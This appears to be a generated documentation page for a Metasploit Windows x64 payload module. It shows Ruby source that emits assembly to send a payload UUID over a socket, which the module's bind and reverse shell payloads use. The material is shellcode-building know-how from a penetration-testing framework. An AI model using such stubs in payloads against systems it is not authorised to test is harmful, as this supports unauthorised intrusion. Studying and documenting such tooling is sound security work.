Module: Msf::Payload::Windows::SendUUID_x64

Included in:
BindNamedPipe_x64, BindTcp_x64, ReverseNamedPipe_x64, ReverseTcp_x64
Defined in:
lib/msf/core/payload/windows/x64/send_uuid_x64.rb

Overview

Basic send_uuid stub for Windows ARCH_X64 payloads

Instance Method Summary collapse

Instance Method Details

#asm_send_uuid(uuid = nil) ⇒ Object

Generate assembly code that writes the UUID to the socket.

This code assumes that the block API pointer is in rbp, and the communications socket handle is in rdi.

[View source]

19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# File 'lib/msf/core/payload/windows/x64/send_uuid_x64.rb', line 19

def asm_send_uuid(uuid=nil)
  uuid ||= generate_payload_uuid
  uuid_raw = uuid.to_raw

  asm =%Q^
    send_uuid:
      xor r9, r9              ; flags
      push #{uuid_raw.length} ; length of the UUID
      pop r8
      call get_uuid_address  ; put uuid buffer on the stack
      db #{raw_to_db(uuid_raw)}  ; UUID
    get_uuid_address:
      pop rdx                ; UUID address
      mov rcx, rdi           ; Socket handle
      mov r10, #{Rex::Text.block_api_hash('ws2_32.dll', 'send')}
      call rbp               ; call send
  ^

  asm
end

#uuid_required_sizeObject

[View source]

40
41
42
43
44
45
46
47
48
# File 'lib/msf/core/payload/windows/x64/send_uuid_x64.rb', line 40

def uuid_required_size
  # Start with the number of bytes required for the instructions
  space = 25

  # a UUID is 16 bytes
  space += 16

  space
end